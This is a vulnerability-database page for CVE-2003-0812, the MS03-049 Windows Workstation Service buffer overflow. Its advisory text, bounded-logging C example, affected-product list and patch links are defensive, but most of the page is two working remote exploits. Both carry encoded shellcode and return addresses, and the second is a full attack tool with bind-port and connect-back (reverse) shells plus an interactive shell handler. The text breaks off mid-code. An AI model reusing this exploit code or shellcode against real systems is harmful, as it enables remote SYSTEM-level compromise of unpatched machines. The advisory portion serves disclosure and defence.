CVE-2003-0812
CVSS 7.5
Published: 2003-12-15 00:00:00
Revised: 2016-10-17 22:37:30

[Original] Stack-based buffer overflow in a logging function for Windows Workstation Service (WKSSVC.DLL) allows remote attackers to execute arbitrary code via RPC calls that cause long entries to be written to a debug log file ("NetSetup.LOG"), as demonstrated using the NetAddAlternateComputerName API.


[CNNVD] Microsoft Windows Workstation Service Remote Buffer Overflow Vulnerability (MS03-049/KB828749) (CNNVD-200312-058)

        
        Microsoft's DCE/RPC services expose network-management functions for administering user accounts and network resources. Some of these functions write debug log files into the "debug" subdirectory of the Windows directory.
        The Microsoft Workstation service performs insufficient bounds checking when writing these log entries. A remote attacker can supply an over-long parameter to trigger a buffer overflow and execute arbitrary instructions on the system with SYSTEM privileges.
        The logging function builds the log string with vsprintf(); the log file is named "NetSetup.LOG" and is stored in the Windows "debug" directory.
        This logging function is called by several of the functions that handle Workstation service commands, such as "NetValidateName" and "NetJoinDomain". In NetValidateName(), the "computer name" passed as the second parameter ends up written to the log file.
        For example, calling the NetValidateName() API as:
         NetValidateName(L"\\\\192.168.0.100","AAAAAAAA",NULL,NULL,0);
        produces the following entries on the remote host:
         08/13 13:01:01 NetpValidateName: checking to see if '' is valid as type 0 name
         08/13 13:01:01 NetpValidateName: '' is not a valid NetBIOS \\AAAAAAAA name: 0x57

        If an over-long string is passed as the second parameter of NetValidateName(), a buffer overflow occurs on the target host, provided the debug log file is writable.
        On NTFS file systems the "debug" directory under the Windows directory is normally not writable by everyone, which means a NULL session cannot be used to generate log entries: the WsImpersonateClient() API is called before the log file is opened, so if the connecting client lacks permission to write the log file, CreateFile() fails and vsprintf() is never reached. The vulnerability is therefore exploitable on FAT32 file systems or wherever the "%SYSTEMROOT%\debug" directory is writable.
        However, some of the extended RPC functions implemented on Windows XP open the log file before calling WsImpersonateClient(). These RPC functions are undocumented but can be seen in the function table of WKSSVC.DLL. Their opnums start at 0x1B; opnum 0x1B, for example, calls NetpManageComputers(), which does not call WsImpersonateClient() before opening the log file.
        NetpManageComputers() is not publicly documented, but the prototype of the NetAddAlternateComputerName() API can be found in "LMJoin.h"; this API is exported from NETAPI32.DLL and is likewise undocumented. This RPC function (opnum 0x1B) can be invoked, and the corresponding packet generated, with the following API call:
         NetAddAlternateComputerName(L"\\\\192.168.0.200",long_unicode_string,NULL,NULL,0);
        No special privileges are required for the second parameter to be written to the log file on the remote host. If an over-long Unicode string is supplied as the second parameter ("AlternateName"), the remote system named by the first parameter crashes from the buffer overflow. The Unicode string "long_unicode_string" is converted to ASCII before the logging function is called.
        
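As an added example (not code from the advisory, from Microsoft or from the exploits below), the following C shows the logging pattern the description attributes to WKSSVC, an unbounded vsprintf() into a fixed stack buffer, beside a bounded replacement that also flags names longer than a legal NetBIOS name; the buffer size, the constant timestamp and all helper names are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the buffer for one log line; the advisory only says
 * the real WKSSVC buffer is a fixed stack buffer, not how large it is. */
#define LOG_LINE_MAX 256
/* Longest valid NetBIOS computer name. */
#define NETBIOS_NAME_MAX 15

/* The pattern the advisory describes: vsprintf() writes caller-controlled
 * text into a fixed buffer with no bound, so an over-long name runs past the
 * end of the stack frame. Kept only for contrast; it is called here with a
 * short constant and must never see untrusted input. */
static void log_unbounded(char *out, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsprintf(out, fmt, ap);            /* no limit on the output length */
    va_end(ap);
}

/* Bounded replacement: vsnprintf() never writes more than outsz bytes and
 * returns the length the whole line would have had, so truncation is
 * detectable. Returns 1 if the line was truncated, 0 otherwise. */
static int log_bounded(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    int needed;
    va_start(ap, fmt);
    needed = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return needed < 0 || (size_t)needed >= outsz;
}

/* Builds the NetpValidateName entry quoted in the advisory for a given name.
 * Returns 1 when the entry had to be truncated or the name is longer than
 * any valid NetBIOS name; either is the over-long input this bug needs and
 * is worth alerting on. The timestamp is a constructed constant. */
int netsetup_log_validate_name(const char *name, char *line, size_t linesz)
{
    int truncated = log_bounded(line, linesz,
        "08/13 13:01:01 NetpValidateName: '' is not a valid NetBIOS \\\\%s name: 0x57",
        name);
    return truncated || strlen(name) > NETBIOS_NAME_MAX;
}

/* Constructed sample input: n 'A' characters (capped at 8191). */
static const char *repeated_a(size_t n)
{
    static char name[8192];
    if (n > sizeof name - 1)
        n = sizeof name - 1;
    memset(name, 'A', n);
    name[n] = '\0';
    return name;
}

/* Alert flag for a name of n 'A' characters. */
int check_repeated_a(size_t n)
{
    char line[LOG_LINE_MAX];
    return netsetup_log_validate_name(repeated_a(n), line, sizeof line);
}

/* Length of the line actually written for n 'A' characters; it never
 * exceeds LOG_LINE_MAX - 1 however long the name is. */
size_t logged_length_repeated_a(size_t n)
{
    char line[LOG_LINE_MAX];
    netsetup_log_validate_name(repeated_a(n), line, sizeof line);
    return strlen(line);
}

int main(void)
{
    char line[LOG_LINE_MAX];
    /* Short constant only: this is the unsafe form, shown for comparison. */
    log_unbounded(line, "NetpValidateName: checking '%s'", "AAAAAAAA");
    printf("%s\n", line);
    printf("8 x 'A'   : alert=%d, line length=%zu\n",
           check_repeated_a(8), logged_length_repeated_a(8));
    printf("4095 x 'A': alert=%d, line length=%zu\n",
           check_repeated_a(4095), logged_length_repeated_a(4095));
    return 0;
}
```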

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2000::sp3:datacenter_server  Microsoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2000::sp4:datacenter_server  Microsoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_2000::sp1:datacenter_server  Microsoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_server  Microsoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_xp::gold:professional  Microsoft Windows XP Professional Gold
cpe:/o:microsoft:windows_2000::sp3:professional  Microsoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2000::sp4:professional  Microsoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_2000::sp1:professional  Microsoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000::sp2:professional  Microsoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000::sp4:advanced_server  Microsoft Windows 2000 Advanced Server SP4
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp3:advanced_server  Microsoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:advanced_server  Microsoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_server  Microsoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp1:server  Microsoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp4:server  Microsoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_2000::sp3:server  Microsoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2000::sp2:server  Microsoft Windows 2000 Server SP2

- OVAL (technical details for detection)

oval:org.mitre.oval:def:575  Windows 2000 Workstation Service Logging Function Buffer Overflow
oval:org.mitre.oval:def:331  Windows XP Workstation Service Logging Function Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; the related OVAL definitions give further technical detail on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0812
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0812
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-058
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=106859247713009&w=2
(UNKNOWN)  BUGTRAQ  20031111 EEYE: Windows Workstation Service Remote Buffer Overflow
http://marc.info/?l=bugtraq&m=106865197102041&w=2
(UNKNOWN)  BUGTRAQ  20031112 Proof of concept for Windows Workstation Service overflow
http://www.cert.org/advisories/CA-2003-28.html
(UNKNOWN)  CERT  CA-2003-28
http://www.cisco.com/warp/public/707/cisco-sa-20040129-ms03-049.shtml
(UNKNOWN)  CISCO  20040129 Buffer Overrun in Microsoft Windows 2000 Workstation Service (MS03-049)
http://www.kb.cert.org/vuls/id/567620
(VENDOR_ADVISORY)  CERT-VN  VU#567620
http://www.microsoft.com/technet/security/bulletin/MS03-049.asp
(VENDOR_ADVISORY)  MS  MS03-049
http://www.securityfocus.com/bid/9011
(VENDOR_ADVISORY)  BID  9011

- Vulnerability information

Microsoft Windows Workstation Service Remote Buffer Overflow Vulnerability (MS03-049/KB828749)
High risk  Boundary condition error
2003-12-15 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Temporary workarounds:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
        * Filter UDP ports 138, 139 and 445 and TCP ports 138, 139 and 445 at the firewall.
        * Use a personal firewall to filter inbound traffic, such as the Internet Connection Firewall bundled with Windows XP.
        * Use the advanced TCP/IP filtering built into Windows 2000 and Windows XP.
        * Disable the Workstation service.
        
        Note: disabling this service will break many services that depend on it; for example, you will no longer be able to access shared resources or use dial-up, *DSL or cable-modem connections. This measure is recommended for experienced users only.
        Vendor patches:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS03-049) and corresponding patches for this issue:
        MS03-049: Buffer Overrun in the Workstation Service Could Allow Code Execution (828749)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS03-049.asp

        Patch downloads:
        Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=2467FE46-D167-479C-9638-D4D79483F261&displaylang=en

        Microsoft Windows XP, Microsoft Windows XP Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=F02DA309-4B0A-4438-A0B9-5B67414C3833&displaylang=en

        Microsoft Windows XP 64-Bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=2BE95254-4C65-4CA5-80A5-55FDF5AA2296&displaylang=en

- Vulnerability information (119)

MS Windows 2000/XP Workstation Service Overflow (MS03-049) (EDBID:119)
windows remote
2003-11-12 Verified
0 eEye
N/A
/*
        Proof of concept for MS03-049.
        This code was tested on a Win2K SP4 with FAT32 file system, and is supposed
        to work *only* with that (it will probably crash the other 2Ks, no clue
        about XPs).

        To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve
        this public version, do not bother to ask.
        
        Credits go to eEye
        See original bulletin for more information, it is very well documented.
*/

#include <stdio.h>
#include <win.h>
#include <string.h>

typedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);

#define SIZE 2048

// PEX generated port binding shellcode (5555)
unsigned char shellcode[] =
"\x66\x81\xec\x04\x07" // sub sp, 704h
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31"
"\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x25\x81\xee\xfc"
"\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x9e\x94\x7c\x25"
"\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x3f\x08\xd1\x0b"
"\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x4d\x22\x32\x2b"
"\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x60\xfb\x2f\x17"
"\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x93\x25\x21\x25"
"\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\xdb\x27\x24\x2d"
"\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x9d\xbc\x16\x2d"
"\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x02\x48\x2d\x76"
"\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x94\x47\x4d\xda"
"\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x23\x8c\x2b\x72"
"\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x89\xfb\x2b\x4d"
"\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x6e\xfb\x2f\xda"
"\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x9a\xf8\x7c\xa8"
"\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x32\x88\x6c\x61"
"\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\xff\xd0\x58\x75"
"\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x27\xfd\x83\x50"
"\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x89\x9d\x83\x70"
"\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\xfd\xc0\x58\x3d"
"\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\xfd\xf6\x5c\x24"
"\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x47\x6c\xd0\x1d"
"\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x52\xb8\x09\xc4"
"\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x77\x47\xf7\x21"
"\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x2d\x6e\x74\x25";

unsigned char jmp[] =
"\xe9\x6f\xfd\xff\xff"; // jmp -290h to land in the payload

int main(void)
{
        int ret;
        HINSTANCE hInstance;
        MYPROC procAddress;
        char szBuffer[SIZE];
        NETRESOURCE netResource;

        netResource.lpLocalName = NULL;
        netResource.lpProvider = NULL;
        netResource.dwType = RESOURCETYPE_ANY;
        netResource.lpRemoteName = "\\\\192.168.175.3\\ipc$";

        ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
        if (ret != 0)
        {
                fprintf(stderr, "[-] WNetAddConnection2 failed\n");
                return 1;
        }

        hInstance = LoadLibrary("netapi32");
        if (hInstance == NULL)
        {
                fprintf(stderr, "[-] LoadLibrary failed\n");
                return 1;
        }

        procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName"); // up to you to check NetAddAlternateComputerName
        if (procAddress == NULL)
        {
                fprintf(stderr, "[-] GetProcAddress failed\n");
                return 1;
        }

        memset(szBuffer, 0x90, sizeof(szBuffer));
        memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1);
        // ebp @ &szBuffer[2013]
        *(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, use opcode search engine for more, but
                      // be aware that a call esp will change the offset in the stack)
        memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char
        ret = (procAddress)(L"\\\\192.168.175.3", szBuffer, NULL, NULL, 0);

        WNetCancelConnection2("\\\\192.168.175.3\\ipc$", 0, TRUE);
        FreeLibrary(hInstance);

        return 0;
}

// milw0rm.com [2003-11-12]

- Vulnerability information (123)

MS Windows Workstation Service WKSSVC Remote Exploit (MS03-049) (EDBID:123)
windows remote
2003-11-14 Verified
0 snooq
N/A
/*
 *  Author: snooq
 *  Date: 14 November 2003  
 *
 *  +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++
 *
 *  This is just slightly better than the one I posted to
 *  packetstorm....
 *
 *  The public version will crash 'services.exe' immediately
 *  while this one crash it only when u exit from shell....
 *
 *  I'm still trying to figure out a way to avoid the 'crash'
 *  all together... any ideas????
 *
 *  Let me know if you hav trouble compiling this shit...
 *  I hope this could be a good e.g for u to try Win32
 *  exploitation..
 *
 *  This code is crappy... if u know of a better way of doing
 *  things... pls tell me.......
 *
 *  Otherwise, if you guys r keen... I'll be more than happy
 *  to go thru this in details wif u all... Meanwhile..enjoy!
 *
 *  +++++++++++++++++++++++++++++++++++++++++++++++++
 */

#pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib") 
#pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib") 
#pragma comment (linker,"/NODEFAULTLIB:libcmt.lib") 
#pragma comment (linker,"/NODEFAULTLIB:libcd.lib") 
#pragma comment (lib,"ws2_32")
#pragma comment (lib,"msvcrt")
#pragma comment (lib,"mpr")
#pragma warning (disable:4013)

#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <stdlib.h>
#include <stdio.h>
#include <lm.h>

#define NOP	0x90
#define PORT	24876
#define KEY	0x99999999

#define ALIGN		1	// Between 0 ~ 3
#define TARGET		1
#define INTERVAL	3
#define TIME_OUT	20
#define PORT_OFFSET_1	198
#define PORT_OFFSET_2	193 
#define IP_OFFSET	186 
#define SC_OFFSET	20	// Gap for some NOPs...
#define RET_SIZE	2026	// Big enuff to take EIP... ;)

#define SC_SIZE_1	sizeof(bindport)
#define SC_SIZE_2	sizeof(connback)

#define BSIZE	2600
#define SSIZE	128

extern char getopt(int,char **,char*);
extern char *optarg;
static int alarm_fired=0;

HMODULE hMod;
FARPROC fxn;
HANDLE t1, t2;

char buff[BSIZE];

struct {
	char *os;
	long jmpesp;
	char *dll;
}

targets[] = {
	{
		"Window 2000 (en) SP4",
		0x77e14c29,
		"user32.dll 5.0.2195.6688" 
	},
	{
		"Window 2000 (en) SP1",
		0x77e3cb4c,
		"user32.dll 5.0.2195.1600" 
	},
	{
		"For debugging only",
		0x41424344,
		"dummy.dll 5.0.2195.1600" 
	}
}, v;

/*
 * HD Moore's shellcode..... ;)
 */

char bindport[]=
	"\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99"
	"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
	"\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f"
	"\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65"
	"\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a"
	"\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10"
	"\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85"
	"\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0"
	"\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f"
	"\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17"
	"\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66"
	"\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8"
	"\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc"
	"\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18"
	"\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f"
	"\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5"
	"\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0"
	"\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66"
	"\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce"
	"\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81"
	"\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65"
	"\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5"
	"\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85"
	"\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4"
	"\xc2\x5b\x91\x99";

char connback[]=
	"\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99"
	"\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
	"\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33"
	"\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b"
	"\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7"
	"\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd"
	"\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce"
	"\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3"
	"\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71"
	"\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09"
	"\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce"
	"\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b"
	"\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd"
	"\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67"
	"\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14"
	"\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99"
	"\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd"
	"\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12"
	"\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72"
	"\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79"
	"\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12"
	"\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12"
	"\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09";

void err_exit(char *s) {
	printf("%s\n",s);
	exit(0);
}

/*
 * Ripped from TESO code and modified by ey4s for win32
 * and... lamer quoted it wholesale here..... =p
 */

void doshell(int sock) {
	int l;
	char buf[512];
	struct timeval time;
	unsigned long ul[2];

	time.tv_sec=1;
	time.tv_usec=0;

	while (1) {
		ul[0]=1;
		ul[1]=sock;

		l=select(0,(fd_set *)&ul,NULL,NULL,&time);
		if(l==1) {
			l=recv(sock,buf,sizeof(buf),0);
			if (l<=0) {
				err_exit("-> Connection closed...\n");
			}
			l=write(1,buf,l);
			if (l<=0) {
				err_exit("-> Connection closed...\n");
			}
		}
		else {
			l=read(0,buf,sizeof(buf));
			if (l<=0) {
				err_exit("-> Connection closed...\n");
			}
			l=send(sock,buf,l,0);
			if (l<=0) {
				err_exit("-> Connection closed...\n");
			}
		}
	}
}

void changeip(char *ip) {
	char *ptr;
	ptr=connback+IP_OFFSET;
	/* Assume Little-Endianess.... */
	*((long *)ptr)=inet_addr(ip)^KEY;
}

void changeport(char *code, int port, int offset) {
	char *ptr;
	ptr=code+offset;
	port^=KEY;
	/* Assume Little-Endianess.... */
	*ptr++=(char)((port>>8)&0xff);
	*ptr++=(char)(port&0xff);
}

void banner() {
	printf("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n\n");
}

void usage(char *s) {
	banner();
	printf("Usage: %s [options]\n",s);
	printf("\t-r\tSize of 'return addresses'\n");
	printf("\t-a\tAlignment size [0~3]\n");
	printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n");
	printf("\t\tPort for shell to connect back (in 'listening' mode)\n");
	printf("\t-s\tShellcode offset from the return address\n");
	printf("\t-h\tTarget's IP\n");
	printf("\t-t\tTarget types. ( -H for more info )\n");
	printf("\t-H\tShow list of possible targets\n");
	printf("\t-l\tListening for shell connecting\n");
	printf("\t\tback to port specified by '-p' switch\n");
	printf("\t-i\tIP for shell to connect back\n");
	printf("\t-I\tTime interval between each trial ('connecting' mode only)\n");
	printf("\t-T\tTime out (in number of seconds)\n\n");
	printf("\tNotes:\n\t======\n\t'-h' is mandatory\n");
	printf("\t'-i' is mandatory if '-l' is specified\n\n");
	exit(0);
}

void showtargets() {
	int i;
	banner();
	printf("Possible targets are:\n");
	printf("=====================\n");
	for (i=0;i<sizeof(targets)/sizeof(v);i++) {
		printf("%d) %s",i+1,targets[i].os);
		printf(" --> 0x%08x (%s)\n",targets[i].jmpesp,targets[i].dll);
	}
	exit(0);
}

void sendstr(char *host) {

	WCHAR wStr[128];
	char ipc[128], hStr[128];

	DWORD ret;
	NETRESOURCE NET;

	hMod=LoadLibrary("netapi32.dll");
	fxn=GetProcAddress(hMod,"NetValidateName");

	_snprintf(ipc,127,"\\\\%s\\ipc$",host);
	_snprintf(hStr,127,"\\\\%s",host);
	MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));

	NET.lpLocalName = NULL;
	NET.lpProvider = NULL;
	NET.dwType = RESOURCETYPE_ANY;
	NET.lpRemoteName = (char*)&ipc;

	printf("-> Setting up $IPC session...(aka 'null session')\n");
	ret=WNetAddConnection2(&NET,"","",0);

	if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); }
	else printf("-> IPC$ session setup successfully...\n");

	printf("-> Sending exploit string...\n");

	ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);

}

VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) {
	err_exit("-> I give up...dude.....");
}

void setalarm(int timeout) {

	MSG msg = { 0, 0, 0, 0 };
	SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);

	while(!alarm_fired) {
		if (GetMessage(&msg, 0, 0, 0) ) {
			if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n");
			DispatchMessage(&msg);
		}
	}

}

void resetalarm() {
	if (TerminateThread(t2,0)==0) {
		err_exit("-> Failed to reset alarm...");
	}
	if (TerminateThread(t1,0)==0) {
		err_exit("-> Failed to kill the 'sending' thread...");
	}
}

void do_send(char *host,int timeout) {
	t1=(HANDLE)_beginthread(sendstr,0,host);
	if (t1==0) { err_exit("-> Failed to send exploit string..."); }
	t2=(HANDLE)_beginthread(setalarm,0,timeout);
	if (t2==0) { err_exit("-> Failed to set alarm clock..."); }
}

int main(int argc, char *argv[]) {

	char opt;
	char *host, *ptr, *ip="";
	struct sockaddr_in sockadd;
	int i, i_len, ok=0, mode=0, flag=0;
	int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;
	int target=TARGET, scsize=SC_SIZE_1, port=PORT;
	int timeout=TIME_OUT, interval=INTERVAL;
	long retaddr;

	WSADATA wsd;
	SOCKET s1, s2;

	if (argc<2) { usage(argv[0]); }

	while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) {
		switch(opt) {
			case 'a':
			align=atoi(optarg);
			break;

			case 'I':
			interval=atoi(optarg);
			break;

			case 'T':
			timeout=atoi(optarg);
			break;

			case 't':
			target=atoi(optarg);
			retaddr=targets[target-1].jmpesp;
			break;

			case 'i':
			ip=optarg;
			changeip(ip);
			break;

			case 'l':
			mode=1;
			scsize=SC_SIZE_2;
			break;

			case 'r':
			retsize=atoi(optarg);
			break;

			case 's':
			sc_offset=atoi(optarg);
			break;
			
			case 'h':
			ok=1;
			host=optarg;
			sockadd.sin_addr.s_addr=inet_addr(optarg);
			break;

			case 'p':
			port=atoi(optarg);
			break;

			case 'H':
			showtargets();
			break;

			default:
			usage(argv[0]);
			break;
		}
	}

	if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); }

	memset(buff,NOP,BSIZE);

	ptr=buff+align;
	for(i=0;i<retsize;i+=4) {
